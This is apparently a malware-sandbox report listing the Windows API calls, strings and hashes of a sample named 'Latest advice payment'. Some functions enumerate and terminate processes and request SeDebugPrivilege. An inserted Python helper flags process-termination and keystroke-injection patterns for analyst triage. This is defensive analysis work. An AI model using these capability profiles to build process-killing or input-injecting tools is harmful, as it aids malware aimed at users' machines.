                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 005D99DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1300414916-2785691316
                                                            • Opcode ID: 436b2b3f656c66ec5b749815de0490dd21a225f8413a155bab834cd8f413b58f
                                                            • Instruction ID: cff7368e360038b1bc6b56a9ae2687175f9f61181c41038ae32a05ebc096c00e
                                                            • Opcode Fuzzy Hash: 436b2b3f656c66ec5b749815de0490dd21a225f8413a155bab834cd8f413b58f
                                                            • Instruction Fuzzy Hash: 5F911671D00229EBDB20DFA5DC85EDEBBB9BF48310F10415AF519A7291EB719A44CFA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 005E6E24
                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 005E6E38
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 005E6E52
                                                            • _wcscat.LIBCMT ref: 005E6EAD
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 005E6EC4
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 005E6EF2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat
                                                            • String ID: SysListView32
                                                            • API String ID: 307300125-78025650
                                                            • Opcode ID: 31843cff7a40bdfd338f371738a76685c559082a59bb5e3ee892c04511fc397b
                                                            • Instruction ID: a7245e2b45ee3470b1e3027ef3558c214e5f698a14c8cb4b3771e6af692d2e9b
                                                            • Opcode Fuzzy Hash: 31843cff7a40bdfd338f371738a76685c559082a59bb5e3ee892c04511fc397b
                                                            • Instruction Fuzzy Hash: 7341A170A00389ABDB259F64CC85BEA7BA9FF18390F10042AF584E71D1D6719D848B60
                                                            APIs
                                                              • Part of subcall function 005C3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 005C3C7A
                                                              • Part of subcall function 005C3C55: Process32FirstW.KERNEL32(00000000,?), ref: 005C3C88
                                                              • Part of subcall function 005C3C55: CloseHandle.KERNEL32(00000000), ref: 005C3D52
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005DE9A4
                                                            • GetLastError.KERNEL32 ref: 005DE9B7
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005DE9E6
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 005DEA63
                                                            • GetLastError.KERNEL32(00000000), ref: 005DEA6E
                                                            • CloseHandle.KERNEL32(00000000), ref: 005DEAA3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: fd1b39eb11233fb98f39562751bda52fba6e9abfa77fd77f70c57a5b8032c8f3
                                                            • Instruction ID: 38505ac90f441046a539c341a8a6abc68b38bf41395152bef207f2e4e8a2a6bd
                                                            • Opcode Fuzzy Hash: fd1b39eb11233fb98f39562751bda52fba6e9abfa77fd77f70c57a5b8032c8f3
                                                            • Instruction Fuzzy Hash: 4B418A712002029FDB24EF18CC9AF6DBBA5BF84314F04841AF9469F3D2CB75A848DB91
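The record above (Toolhelp32 snapshot, OpenProcess with desired access 00000001, TerminateProcess, and the string SeDebugPrivilege) is the kind of API cluster an analyst scans this listing for by hand. The following triage helper is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the "APIs" records in the format shown on this page and flags a few capability clusters per function. The sample input is copied from the listings above; the capability labels and the clustering rules are my own, and the constants PROCESS_TERMINATE (0x0001) and WM_KEYDOWN (0x0100) are the documented Windows SDK values. The flags mark capability present in the binary, not behaviour observed at runtime: since the page identifies the sample as a compiled AutoIt script, these routines belong to the interpreter's runtime and may or may not be reached by the embedded script.

```python
"""Triage helper for Joe Sandbox IDA-plugin "APIs" records (added example, not the report's own code)."""
import re

# Windows SDK constants (winnt.h / winuser.h)
PROCESS_TERMINATE = 0x0001
WM_KEYDOWN = 0x0100

# Constructed sample: lines copied from the function listings on this page.
SAMPLE = """\
APIs
  • Part of subcall function 005C3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 005C3C7A
  • Part of subcall function 005C3C55: Process32FirstW.KERNEL32(00000000,?), ref: 005C3C88
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 005DE9A4
• TerminateProcess.KERNEL32(00000000,00000000), ref: 005DEA63
• CloseHandle.KERNEL32(00000000), ref: 005DEAA3
Strings
APIs
  • Part of subcall function 005BA82C: AttachThreadInput.USER32(00000000,?,005B9683,?,00000001), ref: 005BA85A
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005B96AB
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 005E86FF
"""

# One bullet of an "APIs" record: optional subcall prefix, Api.MODULE, optional (args), then ", ref: ADDR"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)"
)

SECTION_END = {"Strings", "Memory Dump Source", "Similarity"}


def parse_records(text):
    """Split the listing into records (one per 'APIs' heading) of parsed call entries."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            records.append(current)
            continue
        if stripped in SECTION_END:
            current = None
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.append({"api": m["api"], "module": m["module"], "args": args,
                            "ref": m["ref"], "subcall": m["parent"] is not None})
    return records


def _hex(arg):
    """Hex argument as an int, or None for '?' and other non-constant placeholders."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def capabilities(record):
    """Capability labels (my own names) for one record, subcall entries included."""
    names = {c["api"] for c in record}
    found = set()
    if {"CreateToolhelp32Snapshot", "Process32FirstW"} <= names:
        found.add("process-enumeration")
    for c in record:
        # OpenProcess whose access mask includes PROCESS_TERMINATE, paired with TerminateProcess
        if (c["api"] == "OpenProcess" and c["args"] and "TerminateProcess" in names
                and (_hex(c["args"][0]) or 0) & PROCESS_TERMINATE):
            found.add("process-termination")
        # WM_KEYDOWN posted to a window after attaching to its input queue
        if (c["api"] == "PostMessageW" and len(c["args"]) > 1
                and _hex(c["args"][1]) == WM_KEYDOWN and "AttachThreadInput" in names):
            found.add("keystroke-injection")
    return found


def triage(text):
    """(first direct call-site address, sorted capability labels) for every flagged record."""
    out = []
    for rec in parse_records(text):
        caps = capabilities(rec)
        if caps:
            direct = [c for c in rec if not c["subcall"]]
            out.append(((direct or rec)[0]["ref"], sorted(caps)))
    return out


if __name__ == "__main__":
    for ref, caps in triage(SAMPLE):
        print(ref, ", ".join(caps))
```

Run against a full report export it produces one line per flagged function keyed by its first direct call-site address, which maps straight back to the "ref:" entries above. Add rules by extending capabilities(); keep each rule tied to an argument check where the listing gives one (the access mask, the message id), since the bare API name set is noisy on an interpreter runtime this large.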
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 005C3033
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
                                                            • Opcode ID: ea5976d702eea36c97936ccec8399087ca4174c3d1ad4d0da546ed1ff4921dec
                                                            • Instruction ID: 64e59c2555a679782fcde40a12bdc50a581889e8fd00c05a9fe6b8999dabe4df
                                                            • Opcode Fuzzy Hash: ea5976d702eea36c97936ccec8399087ca4174c3d1ad4d0da546ed1ff4921dec
                                                            • Instruction Fuzzy Hash: 9111EB3274C38ABEE7149A94DC8AEAB7F9CFF15360F20406EF90076181DB715F4056A8
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 005C4312
                                                            • LoadStringW.USER32(00000000), ref: 005C4319
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 005C432F
                                                            • LoadStringW.USER32(00000000), ref: 005C4336
                                                            • _wprintf.LIBCMT ref: 005C435C
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 005C437A
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 005C4357
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                             • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            • Opcode ID: 83b1f64444107bf39e9e8b55254b23931e5062010eefd0bb3313ce1cca4ba1b6
                                                            • Instruction ID: f34fc9e6ece0fae9ecd3edcd92664ed2d628ae128191a40f4d370a5b5706e8b0
                                                            • Opcode Fuzzy Hash: 83b1f64444107bf39e9e8b55254b23931e5062010eefd0bb3313ce1cca4ba1b6
                                                            • Instruction Fuzzy Hash: DB0162F290024CBFE715ABA0DD89FE6776CEB48700F0005A5BB85E6051EE745F899B70
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • GetSystemMetrics.USER32(0000000F), ref: 005ED47C
                                                            • GetSystemMetrics.USER32(0000000F), ref: 005ED49C
                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 005ED6D7
                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 005ED6F5
                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 005ED716
                                                            • ShowWindow.USER32(00000003,00000000), ref: 005ED735
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 005ED75A
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 005ED77D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                            • String ID:
                                                            • API String ID: 1211466189-0
                                                            • Opcode ID: 8a1c7cf50f3497d9a450893e2abbe68b95435dca0240d0ffcfa2abd130593bc5
                                                            • Instruction ID: dfba222832064ea0658f131498fef9bf98796cdc828f687d4cc18923db7ba4bc
                                                            • Opcode Fuzzy Hash: 8a1c7cf50f3497d9a450893e2abbe68b95435dca0240d0ffcfa2abd130593bc5
                                                            • Instruction Fuzzy Hash: C3B17975600269EBDF18CF6AC9C57AD7BB1FF44701F088069EC889F295DB74A950CBA0
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0059C1C7,00000004,00000000,00000000,00000000), ref: 00562ACF
                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0059C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00562B17
                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0059C1C7,00000004,00000000,00000000,00000000), ref: 0059C21A
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0059C1C7,00000004,00000000,00000000,00000000), ref: 0059C286
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: 531dcf7d7fd4fefb73b963bcf4ec569939f8776b1a7d8ac5450d40c67e733107
                                                            • Instruction ID: 654e1f400dcc6a41302d9d191f5e0d6c1d0d3606e74ce0514f4ad50b9eed4bf3
                                                            • Opcode Fuzzy Hash: 531dcf7d7fd4fefb73b963bcf4ec569939f8776b1a7d8ac5450d40c67e733107
                                                            • Instruction Fuzzy Hash: 9641D634608FC09ADB399BA89C8CB6A7F92BB95310F18891DE0C787561CAF5A845E711
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 005C70DD
                                                              • Part of subcall function 00580DB6: std::exception::exception.LIBCMT ref: 00580DEC
                                                              • Part of subcall function 00580DB6: __CxxThrowException@8.LIBCMT ref: 00580E01
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 005C7114
                                                            • EnterCriticalSection.KERNEL32(?), ref: 005C7130
                                                            • _memmove.LIBCMT ref: 005C717E
                                                            • _memmove.LIBCMT ref: 005C719B
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 005C71AA
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 005C71BF
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 005C71DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 256516436-0
                                                            • Opcode ID: e1c33920cd8c5efe274ac1baf0567837f1c14f893f93bd6ea46db8d5254c3e54
                                                            • Instruction ID: d5a9d208845bed6d5fa22047ab2b702acfdb132278bfb784fe0f8921adf7c6ef
                                                            • Opcode Fuzzy Hash: e1c33920cd8c5efe274ac1baf0567837f1c14f893f93bd6ea46db8d5254c3e54
                                                            • Instruction Fuzzy Hash: DA315235900205EFDB44EFA4DC89AAB7B78FF85710F1481A9FD04AB256DB309A14DB60
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 005E61EB
                                                            • GetDC.USER32(00000000), ref: 005E61F3
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005E61FE
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 005E620A
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 005E6246
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 005E6257
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,005E902A,?,?,000000FF,00000000,?,000000FF,?), ref: 005E6291
                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 005E62B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            • Opcode ID: 78082032d826048aca21b735b128f5afd4729508b27b6ec8b8ed75954d6552ee
                                                            • Instruction ID: 59e4ea4a044ba0c9b6d119401b98ea9685e5a258459e3369d8a952fe6cb34569
                                                            • Opcode Fuzzy Hash: 78082032d826048aca21b735b128f5afd4729508b27b6ec8b8ed75954d6552ee
                                                            • Instruction Fuzzy Hash: DB318D76100250BFEF198F51CC8AFEA3FA9FF597A5F044065FE889E191CA759841CB60
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: d7436da8bf074ee610d19c4bfe0a7a3a237dfb3e20faeb0d8d6330d142a63306
                                                            • Instruction ID: b9d6bf94f0582356cf0dd4b3c5cba6ef86f5ded319237e968bbb1398755424b6
                                                            • Opcode Fuzzy Hash: d7436da8bf074ee610d19c4bfe0a7a3a237dfb3e20faeb0d8d6330d142a63306
                                                            • Instruction Fuzzy Hash: 6A2160A2601A0A7BFA04B6119D43FFB7F5DBE50388F044414FE04A6647EFD8AE1283A5
                                                            APIs
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                              • Part of subcall function 0057FC86: _wcscpy.LIBCMT ref: 0057FCA9
                                                            • _wcstok.LIBCMT ref: 005CEC94
                                                            • _wcscpy.LIBCMT ref: 005CED23
                                                            • _memset.LIBCMT ref: 005CED56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                            • String ID: X
                                                            • API String ID: 774024439-3081909835
                                                            • Opcode ID: d7d5ae8b2d16b953405b5625e4bdc859ee38a29b4c8b3648ded60563a6b4092d
                                                            • Instruction ID: 13ba9a6c8c336ea4502b4e75453c04a5d0088102703f42cece6e9b5449d072bb
                                                            • Opcode Fuzzy Hash: d7d5ae8b2d16b953405b5625e4bdc859ee38a29b4c8b3648ded60563a6b4092d
                                                            • Instruction Fuzzy Hash: 51C15F715087469FC754EF64C88AE5ABBE4FF85314F04492DF8999B2A2DB30EC45CB42
                                                            APIs
                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 005D6C00
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 005D6C21
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D6C34
                                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 005D6CEA
                                                            • inet_ntoa.WSOCK32(?), ref: 005D6CA7
                                                              • Part of subcall function 005BA7E9: _strlen.LIBCMT ref: 005BA7F3
                                                              • Part of subcall function 005BA7E9: _memmove.LIBCMT ref: 005BA815
                                                            • _strlen.LIBCMT ref: 005D6D44
                                                            • _memmove.LIBCMT ref: 005D6DAD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                            • String ID:
                                                            • API String ID: 3619996494-0
                                                            • Opcode ID: 699ab2435615fc28f25180418d585192421e8bb7d292520923101d39a150db15
                                                            • Instruction ID: baed9aa86a6f59e2cd0fc1aca8460066249473b9807fe78f8832d54ef7120629
                                                            • Opcode Fuzzy Hash: 699ab2435615fc28f25180418d585192421e8bb7d292520923101d39a150db15
                                                            • Instruction Fuzzy Hash: F981E371204301ABD720EB28DC8AE6ABBA9FFD4714F104A1EF5559B392DA70ED05CB51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 82997fb647df93c8fd14dff8e82e26d6a57ceb75ebd854d4a5b1884ae77b0013
                                                            • Instruction ID: 63e32537383bf43af1f969f6924ab0547ff7ae04376e655ac44ef773980bd3cb
                                                            • Opcode Fuzzy Hash: 82997fb647df93c8fd14dff8e82e26d6a57ceb75ebd854d4a5b1884ae77b0013
                                                            • Instruction Fuzzy Hash: F2714734900509EFDF14CF98CC89ABEBF79FF85311F188159E916AB251CB34AA51CBA4
                                                            APIs
                                                            • IsWindow.USER32(01076498), ref: 005EB3EB
                                                            • IsWindowEnabled.USER32(01076498), ref: 005EB3F7
                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 005EB4DB
                                                            • SendMessageW.USER32(01076498,000000B0,?,?), ref: 005EB512
                                                            • IsDlgButtonChecked.USER32(?,?), ref: 005EB54F
                                                            • GetWindowLongW.USER32(01076498,000000EC), ref: 005EB571
                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 005EB589
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                            • String ID:
                                                            • API String ID: 4072528602-0
                                                            • Opcode ID: 7986497437708410a7ad847fc46c10bcf6ba076b0b27159fe25d6f3c45e0b7b9
                                                            • Instruction ID: 4e34bed662455853134c09e89b1e3bbd01053535e3a5f0ee26a2e745bd8133ce
